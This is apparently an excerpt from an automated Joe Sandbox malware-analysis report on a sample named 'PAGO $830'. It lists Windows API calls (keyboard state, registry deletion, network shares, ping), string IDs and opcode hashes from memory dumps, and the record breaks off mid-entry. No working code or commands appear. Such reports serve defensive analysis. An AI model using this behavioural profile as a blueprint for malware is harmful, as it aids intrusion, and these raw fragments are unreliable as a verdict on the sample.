                                                          • GetFocus.USER32 ref: 00E08C5C
                                                          • GetDlgCtrlID.USER32(00000000), ref: 00E08C67
                                                          • DefDlgProcW.USER32(?,00000111,?,?,00000000,?,?,?,?,?,?,?), ref: 00E08D0F
                                                          • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 00E08DC1
                                                          • GetMenuItemCount.USER32(?), ref: 00E08DDE
                                                          • GetMenuItemID.USER32(?,00000000), ref: 00E08DEE
                                                          • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 00E08E20
                                                          • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 00E08E62
                                                          • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00E08E93
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                           • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow
                                                          • String ID: 0
                                                          • API String ID: 1026556194-4108050209
                                                          • Opcode ID: b932eda35216b1ce2253ebfe30e493f949f188f5053fd96f1e46fc7edd627917
                                                          • Instruction ID: ccd33bccd838eb8f6537606c2b9acec24fbb644ed708fdf2eb97cee946cecaa5
                                                          • Opcode Fuzzy Hash: b932eda35216b1ce2253ebfe30e493f949f188f5053fd96f1e46fc7edd627917
                                                          • Instruction Fuzzy Hash: 9581BC70504301AFDB10CF15DE84AABBBE8FB98358F101A19F984A72D1DB71D985CBA2
                                                          APIs
                                                          • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 00DFCB8B
                                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?,00000000), ref: 00DFCBB4
                                                          • FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 00DFCC6F
                                                            • Part of subcall function 00DFCB5B: RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 00DFCBD1
                                                            • Part of subcall function 00DFCB5B: LoadLibraryA.KERNEL32(advapi32.dll,?,?,00000000), ref: 00DFCBE4
                                                            • Part of subcall function 00DFCB5B: GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00DFCBF6
                                                            • Part of subcall function 00DFCB5B: FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 00DFCC2C
                                                            • Part of subcall function 00DFCB5B: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 00DFCC4F
                                                          • RegDeleteKeyW.ADVAPI32(?,?), ref: 00DFCC1A
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                           • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: Library$EnumFree$AddressCloseDeleteLoadOpenProc
                                                          • String ID: RegDeleteKeyExW$advapi32.dll
                                                          • API String ID: 2734957052-4033151799
                                                          • Opcode ID: a3421c16b055c440398f1870932837b0cd9dde21e927a831fca9afe05c8912d2
                                                          • Instruction ID: b7b1cf58e4d645455c762a70d080cf7fdbceb434396ea269e8cdc0edff7d606f
                                                          • Opcode Fuzzy Hash: a3421c16b055c440398f1870932837b0cd9dde21e927a831fca9afe05c8912d2
                                                          • Instruction Fuzzy Hash: FB317C7190112CBFDB208B51DD88EFFBB7CEF45740F155165AA0AA2140DA309E89DAB0
                                                          APIs
                                                          • timeGetTime.WINMM ref: 00DDE5D2
                                                            • Part of subcall function 00D8E465: timeGetTime.WINMM(?,?,00DDE5F2), ref: 00D8E469
                                                          • Sleep.KERNEL32(0000000A), ref: 00DDE5FF
                                                          • EnumThreadWindows.USER32(?,Function_0006E583,00000000), ref: 00DDE623
                                                          • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00DDE645
                                                          • SetActiveWindow.USER32 ref: 00DDE664
                                                          • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00DDE672
                                                          • SendMessageW.USER32(00000010,00000000,00000000), ref: 00DDE691
                                                          • Sleep.KERNEL32(000000FA), ref: 00DDE69C
                                                          • IsWindow.USER32 ref: 00DDE6A8
                                                          • EndDialog.USER32(00000000), ref: 00DDE6B9
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                           • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                          • String ID: BUTTON
                                                          • API String ID: 1194449130-3405671355
                                                          • Opcode ID: b443a096413cda57447a038b565a7b3ccff9a2cb975a158ac9138a46852e3bb4
                                                          • Instruction ID: ddf211ae6e0df8d144883b8f7c573f6f5c2c45fd508d8da290bdd2708b2f1b6c
                                                          • Opcode Fuzzy Hash: b443a096413cda57447a038b565a7b3ccff9a2cb975a158ac9138a46852e3bb4
                                                          • Instruction Fuzzy Hash: 2421A178200200AFEB116F32EC88B363B69F756744B55191AF901A53B1DB72FC899A35
                                                          APIs
                                                            • Part of subcall function 00D7B606: _wcslen.LIBCMT ref: 00D7B610
                                                          • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00DDE97B
                                                          • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00DDE991
                                                          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00DDE9A2
                                                          • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00DDE9B4
                                                          • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00DDE9C5
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                           • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: SendString$_wcslen
                                                          • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                          • API String ID: 2420728520-1007645807
                                                          • Opcode ID: df7927fd00da714deb5fbe20ce40097fbaab5e4768cddf994806b0cc32039e07
                                                          • Instruction ID: 533f924459b99109f27b55bf8cd627217fe4c7487100c0c9e82562d282213de6
                                                          • Opcode Fuzzy Hash: df7927fd00da714deb5fbe20ce40097fbaab5e4768cddf994806b0cc32039e07
                                                          • Instruction Fuzzy Hash: 1A11CE31A8135879DB20B7B69C4AEFF6F7CEBD2B00F44442A7801B60D1EAB04904C9B0
                                                          APIs
                                                            • Part of subcall function 00D8A4D7: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00D8A15D,?,00000000,?,?,?,?,00D8A12F,00000000,?), ref: 00D8A53A
                                                          • DestroyWindow.USER32(?), ref: 00D8A1F6
                                                          • KillTimer.USER32(00000000,?,?,?,?,00D8A12F,00000000,?), ref: 00D8A290
                                                          • DestroyAcceleratorTable.USER32(00000000), ref: 00DC73C6
                                                          • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,00000000,?,?,?,?,00D8A12F,00000000,?), ref: 00DC73F4
                                                          • ImageList_Destroy.COMCTL32(?,?,?,?,?,?,?,00000000,?,?,?,?,00D8A12F,00000000,?), ref: 00DC740B
                                                          • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00D8A12F,00000000), ref: 00DC7427
                                                          • DeleteObject.GDI32(00000000), ref: 00DC7439
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                           • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                          • String ID:
                                                          • API String ID: 641708696-0
                                                          • Opcode ID: e401582842ea80cc540ea01d79cd12b6c090297408cb09b32b2b3ef9294b9ded
                                                          • Instruction ID: 38e621440d50f71e61e41bbecde59711297014e0e98e1d2d9648c76ddde564da
                                                          • Opcode Fuzzy Hash: e401582842ea80cc540ea01d79cd12b6c090297408cb09b32b2b3ef9294b9ded
                                                          • Instruction Fuzzy Hash: 8961BD34504701DFEB35AF1AD948B297BB1FB41312F28155EE082A79A0C372B9D5DFA2
                                                          APIs
                                                            • Part of subcall function 00D8ADC4: GetWindowLongW.USER32(?,000000EB), ref: 00D8ADD2
                                                          • GetSysColor.USER32(0000000F), ref: 00D8ACE2
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                           • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: ColorLongWindow
                                                          • String ID:
                                                          • API String ID: 259745315-0
                                                          • Opcode ID: 37186dd7e7781bfe584f43aaa0794cf97546e7344a5e81d5b5b7b24173338e9e
                                                          • Instruction ID: 106035e52ca55d3eaf9c94bbc5b7f2c4530b6a61da5b44fafd75ab319083f4f1
                                                          • Opcode Fuzzy Hash: 37186dd7e7781bfe584f43aaa0794cf97546e7344a5e81d5b5b7b24173338e9e
                                                          • Instruction Fuzzy Hash: 2541D331105641AFEB206B3DDC48FB93765EB06362F28460AF9A6DB1E1D7319C82DB31
                                                          APIs
                                                          • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,00DC03D3,?,0000138C,?,?,?,?,00000000,?), ref: 00DD9635
                                                          • LoadStringW.USER32(00000000,?,00DC03D3,?), ref: 00DD963E
                                                            • Part of subcall function 00D7B606: _wcslen.LIBCMT ref: 00D7B610
                                                          • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,?,00DC03D3,?,0000138C,?,?,?,?,00000000,?,?), ref: 00DD9660
                                                          • LoadStringW.USER32(00000000,?,00DC03D3,?), ref: 00DD9663
                                                          • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00DD9784
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                           • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: HandleLoadModuleString$Message_wcslen
                                                          • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                          • API String ID: 747408836-2268648507
                                                          APIs
                                                            • Part of subcall function 00D784E7: _wcslen.LIBCMT ref: 00D784FA
                                                          • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00DD068B
                                                          • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 00DD06A7
                                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 00DD06C3
                                                          • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00DD06ED
                                                          • CLSIDFromString.OLE32(?,000001FE,?,SOFTWARE\Classes\), ref: 00DD0715
                                                          • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00DD0720
                                                          • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00DD0725
                                                          Strings
                                                          Similarity
                                                          • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_wcslen
                                                          • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                          • API String ID: 323675364-22481851
                                                          APIs
                                                          • VariantInit.OLEAUT32(?), ref: 00DF3B83
                                                          • CoInitialize.OLE32(00000000), ref: 00DF3BB1
                                                          • CoUninitialize.OLE32 ref: 00DF3BBB
                                                          • _wcslen.LIBCMT ref: 00DF3C54
                                                          • GetRunningObjectTable.OLE32(00000000,?), ref: 00DF3CD8
                                                          • SetErrorMode.KERNEL32(00000001,00000029), ref: 00DF3DFC
                                                          • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,?), ref: 00DF3E35
                                                          • CoGetObject.OLE32(?,00000000,00E0FBB4,?), ref: 00DF3E54
                                                          • SetErrorMode.KERNEL32(00000000), ref: 00DF3E67
                                                          • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00DF3EEB
                                                          • VariantClear.OLEAUT32(?), ref: 00DF3EFF
                                                          Similarity
                                                          • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize_wcslen
                                                          • String ID:
                                                          • API String ID: 429561992-0
                                                          APIs
                                                          • CoInitialize.OLE32(00000000), ref: 00DE7A11
                                                          • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00DE7AAD
                                                          • SHGetDesktopFolder.SHELL32(?), ref: 00DE7AC1
                                                          • CoCreateInstance.OLE32(00E0FD24,00000000,00000001,00E36E7C,?), ref: 00DE7B0D
                                                          • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00DE7B92
                                                          • CoTaskMemFree.OLE32(?,?), ref: 00DE7BEA
                                                          • SHBrowseForFolderW.SHELL32(?), ref: 00DE7C75
                                                          • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00DE7C98
                                                          • CoTaskMemFree.OLE32(00000000), ref: 00DE7C9F
                                                          • CoTaskMemFree.OLE32(00000000), ref: 00DE7CF4
                                                          • CoUninitialize.OLE32 ref: 00DE7CFA
                                                          Similarity
                                                          • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
                                                          • String ID:
                                                          • API String ID: 2762341140-0
                                                          APIs
                                                          • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00E05439
                                                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00E0544A
                                                          • CharNextW.USER32(00000158), ref: 00E05479
                                                          • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00E054BA
                                                          • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00E054D0
                                                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00E054E1
                                                          Similarity
                                                          • API ID: MessageSend$CharNext
                                                          • String ID:
                                                          • API String ID: 1350042424-0
                                                          APIs
                                                          • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00DCF998
                                                          • SafeArrayAllocData.OLEAUT32(?), ref: 00DCF9F1
                                                          • VariantInit.OLEAUT32(?), ref: 00DCFA03
                                                          • SafeArrayAccessData.OLEAUT32(?,?), ref: 00DCFA23
                                                          • VariantCopy.OLEAUT32(?,?), ref: 00DCFA76
                                                          • SafeArrayUnaccessData.OLEAUT32(?), ref: 00DCFA8A
                                                          • VariantClear.OLEAUT32(?), ref: 00DCFA9F
                                                          • SafeArrayDestroyData.OLEAUT32(?), ref: 00DCFAAC
                                                          • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00DCFAB5
                                                          • VariantClear.OLEAUT32(?), ref: 00DCFAC7
                                                          • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00DCFAD2
                                                          Similarity
                                                          • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                          • String ID:
                                                          • API String ID: 2706829360-0
                                                          APIs
                                                          • GetKeyboardState.USER32(?), ref: 00DD9BBF
                                                          • GetAsyncKeyState.USER32(000000A0), ref: 00DD9C40
                                                          • GetKeyState.USER32(000000A0), ref: 00DD9C5B
                                                          • GetAsyncKeyState.USER32(000000A1), ref: 00DD9C75
                                                          • GetKeyState.USER32(000000A1), ref: 00DD9C8A
                                                          • GetAsyncKeyState.USER32(00000011), ref: 00DD9CA2
                                                          • GetKeyState.USER32(00000011), ref: 00DD9CB4
                                                          • GetAsyncKeyState.USER32(00000012), ref: 00DD9CCC
                                                          • GetKeyState.USER32(00000012), ref: 00DD9CDE
                                                          • GetAsyncKeyState.USER32(0000005B), ref: 00DD9CF6
                                                          • GetKeyState.USER32(0000005B), ref: 00DD9D08
                                                          Similarity
                                                          • API ID: State$Async$Keyboard
                                                          • String ID:
                                                          • API String ID: 541375521-0
                                                          APIs
                                                          • GetForegroundWindow.USER32(00E0D0D0,?,?), ref: 00DD4212
                                                            • Part of subcall function 00DD3F58: CharUpperBuffW.USER32(?,?,00000000,00E0D0D0,?,?,00000001,?,?,00DD4286,?,?,?,?,00000000,00E0D0D0), ref: 00DD3FE5
                                                          • _wcslen.LIBCMT ref: 00DD4296
                                                          • _wcslen.LIBCMT ref: 00DD42F0
                                                          • _wcslen.LIBCMT ref: 00DD4337
                                                          • _wcslen.LIBCMT ref: 00DD437B
                                                          Strings
                                                          Similarity
                                                          • API ID: _wcslen$BuffCharForegroundUpperWindow
                                                          • String ID: ACTIVE$HANDLE$LAST$REGEXPTITLE
                                                          • API String ID: 1486467469-1994484594
                                                          APIs
                                                          • WSAStartup.WSOCK32(00000101,?), ref: 00DF04E3
                                                          • inet_addr.WSOCK32(?), ref: 00DF0543
                                                          • gethostbyname.WSOCK32(?), ref: 00DF054F
                                                          • IcmpCreateFile.IPHLPAPI ref: 00DF055D
                                                          • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00DF05ED
                                                          • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00DF060C
                                                          • IcmpCloseHandle.IPHLPAPI(?), ref: 00DF06E0
                                                          • WSACleanup.WSOCK32 ref: 00DF06E6
                                                          Strings
                                                          Similarity
                                                          • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                          • String ID: Ping
                                                          • API String ID: 1028309954-2246546115
                                                          APIs
                                                          Strings
                                                          Similarity
                                                          • API ID: _wcslen$BuffCharLower
                                                          • String ID: cdecl$none$stdcall$winapi
                                                          • API String ID: 707087890-567219261
                                                          APIs
                                                          • CoInitialize.OLE32 ref: 00DF369B
                                                          • CoUninitialize.OLE32 ref: 00DF36A6
                                                          • CoCreateInstance.OLE32(?,00000000,00000017,00E0FB94,?), ref: 00DF3700
                                                          • IIDFromString.OLE32(?,?), ref: 00DF3773
                                                          • VariantInit.OLEAUT32(?), ref: 00DF380B
                                                          • VariantClear.OLEAUT32(?), ref: 00DF385D
                                                          Strings
                                                          Similarity
                                                          • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
                                                          • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                          • API String ID: 636576611-1287834457
                                                          • Opcode ID: abbfed6a4dc5d54a5fc4436d9135bb13349c6edca6dc3ebcd5ad55a312a47a3e
                                                          • Instruction ID: 252a439e6e2ba53ce3d3ee3a258c581fa558cd80c9936405e3fb9a70bf7727ee
                                                          • Opcode Fuzzy Hash: abbfed6a4dc5d54a5fc4436d9135bb13349c6edca6dc3ebcd5ad55a312a47a3e
                                                          • Instruction Fuzzy Hash: 326192B1208305AFD310EF55C849B6ABBE4EF48710F168519FA859B291D770EE48CBB2
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: _wcslen
                                                          • String ID: ACTIVE$HANDLE$LAST$REGEXPTITLE
                                                          • API String ID: 176396367-1994484594
                                                          • Opcode ID: 89629dd56373512d61d1e1a191d2781b4016b1fd165897be07e026a58f492efb
                                                          • Instruction ID: a20d2dede86247dc42ab2b6f68a5d4ce68dd4c9e17c3833597a0b2c658da7b18
                                                          • Opcode Fuzzy Hash: 89629dd56373512d61d1e1a191d2781b4016b1fd165897be07e026a58f492efb
                                                          • Instruction Fuzzy Hash: 1B51FF22B003228B8B248E6D898557B77E1BF95B14B68452AE885A7744FB30DD49C3B0
                                                          APIs
                                                            • Part of subcall function 00D8B021: GetWindowLongW.USER32(?,000000EB), ref: 00D8B032
                                                            • Part of subcall function 00D8EA9A: GetCursorPos.USER32(?), ref: 00D8EAAE
                                                            • Part of subcall function 00D8EA9A: ScreenToClient.USER32(?,?), ref: 00D8EACB
                                                            • Part of subcall function 00D8EA9A: GetAsyncKeyState.USER32(00000001), ref: 00D8EB02
                                                            • Part of subcall function 00D8EA9A: GetAsyncKeyState.USER32(00000002), ref: 00D8EB1C
                                                          • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?,?,?), ref: 00E08A5D
                                                          • ImageList_EndDrag.COMCTL32 ref: 00E08A63
                                                          • ReleaseCapture.USER32 ref: 00E08A69
                                                          • SetWindowTextW.USER32(?,00000000), ref: 00E08B04
                                                          • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00E08B17
                                                          • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?,?,?), ref: 00E08BF1
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                                                          • String ID: @GUI_DRAGFILE$@GUI_DROPID$p#
                                                          • API String ID: 1924731296-655930031
                                                          • Opcode ID: 63829133f08adf368c70488dd70c05cee594d4396553de1539fe0b070fe3ad5d
                                                          • Instruction ID: 63dc11cff3c7591b22fd797f666186ea50e7397cdeb8d2f125f95c5dc9259308
                                                          • Opcode Fuzzy Hash: 63829133f08adf368c70488dd70c05cee594d4396553de1539fe0b070fe3ad5d
                                                          • Instruction Fuzzy Hash: 8751C074204300AFDB14EF20DC96FAA37E4FB88714F40161DF995672E2DB71A988CB62
                                                          APIs
                                                          • LoadStringW.USER32(00000066,?,00000FFF), ref: 00DE32ED
                                                            • Part of subcall function 00D7B606: _wcslen.LIBCMT ref: 00D7B610
                                                          • LoadStringW.USER32(00000072,?,00000FFF,?), ref: 00DE330E
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: LoadString$_wcslen
                                                          • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
                                                          • API String ID: 4099089115-3080491070
                                                          • Opcode ID: 6ea0c5123ab6af5953f2c1a79db3fdd1d89af9edd1049c3527e3b7c543320978
                                                          • Instruction ID: 997076cc457bf908485e9a3141fcbe46141945bf1b808b00f9b548d6c6ebd003
                                                          • Opcode Fuzzy Hash: 6ea0c5123ab6af5953f2c1a79db3fdd1d89af9edd1049c3527e3b7c543320978
                                                          • Instruction Fuzzy Hash: 00518872900209AACF15EBE1CD46EEEB778EF14340F548066B509720A2EB756F99DB70
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmp
